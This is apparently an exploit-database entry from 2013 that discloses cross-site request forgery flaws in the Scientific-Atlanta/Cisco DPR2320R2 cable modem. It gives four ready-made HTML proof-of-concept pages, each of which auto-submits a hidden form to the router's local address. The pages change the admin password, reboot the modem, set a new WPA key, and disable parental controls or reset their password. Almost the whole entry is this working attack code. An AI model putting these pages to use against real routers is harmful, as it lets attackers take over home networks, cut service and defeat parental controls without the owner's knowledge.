DPR2320R2 [Scientific-Atlanta, Inc. Cisco ] - Multiple CSRF Vulnerability

2013-12-02T00:00:00
ID 1337DAY-ID-21602
Type zdt
Reporter sajith
Modified 2013-12-02T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            (1) Attacker can change the modem authentication password using CSRF
vulnerability .check the below POC
 
<html lang="en">
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://192.168.0.1/goform/RgSecurity" id="formid"
method="post">
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="PasswordReEnter" value="123456" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
 
 
(2)Attacker can reboot modem using CSRF vulnerability(check below POC)
 
 
<html lang="en">
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://192.168.0.1/goform/restart" id="formid" method="post">
<input type="hidden" name="Restart" value="" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
 
 
 
 
(3)wireless settings can be exploited using CSRF vulnerability.below POC
shows how password is changed for n/w
 
authentication WPA-PSK with WPA-encryption set to TKIP(these setting can
also be changed)
 
 
<html lang="en">
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="https://192.168.0.1/goform/wlanSecurity" id="formid"
method="post">
<input type="hidden" name="NetworkAuthentication" value="3" />
<input type="hidden" name="WpaEncryption" value="1" />
<input type="hidden" name="WpaPreSharedKey" value="12345678" />
<input type="hidden" name="WpaRekeyInterval" value="0" />
<input type="hidden" name="GenerateWepKeys" value="0" />
<input type="hidden" name="WepKeysGenerated" value="0" />
<input type="hidden" name="commitwlanSecurity" value="1" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
 
 
(4)Parental control set up can be disabled or password set for parental set
up can be changed by CSRF vulnerability[POC shown below]
 
 
<html lang="en">
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://192.168.0.1/goform/RgParentalBasic" id="formid"
method="post">
<input type="hidden" name="NewContentRule" value="" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="NewKeyword" value="" />
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="NewAllowedDomain" value="" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="1234" />
<input type="hidden" name="ParentalPasswordReEnter" value="1234" />
<input type="hidden" name="AccessDuration" value="30" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

#  0day.today [2018-02-27]  #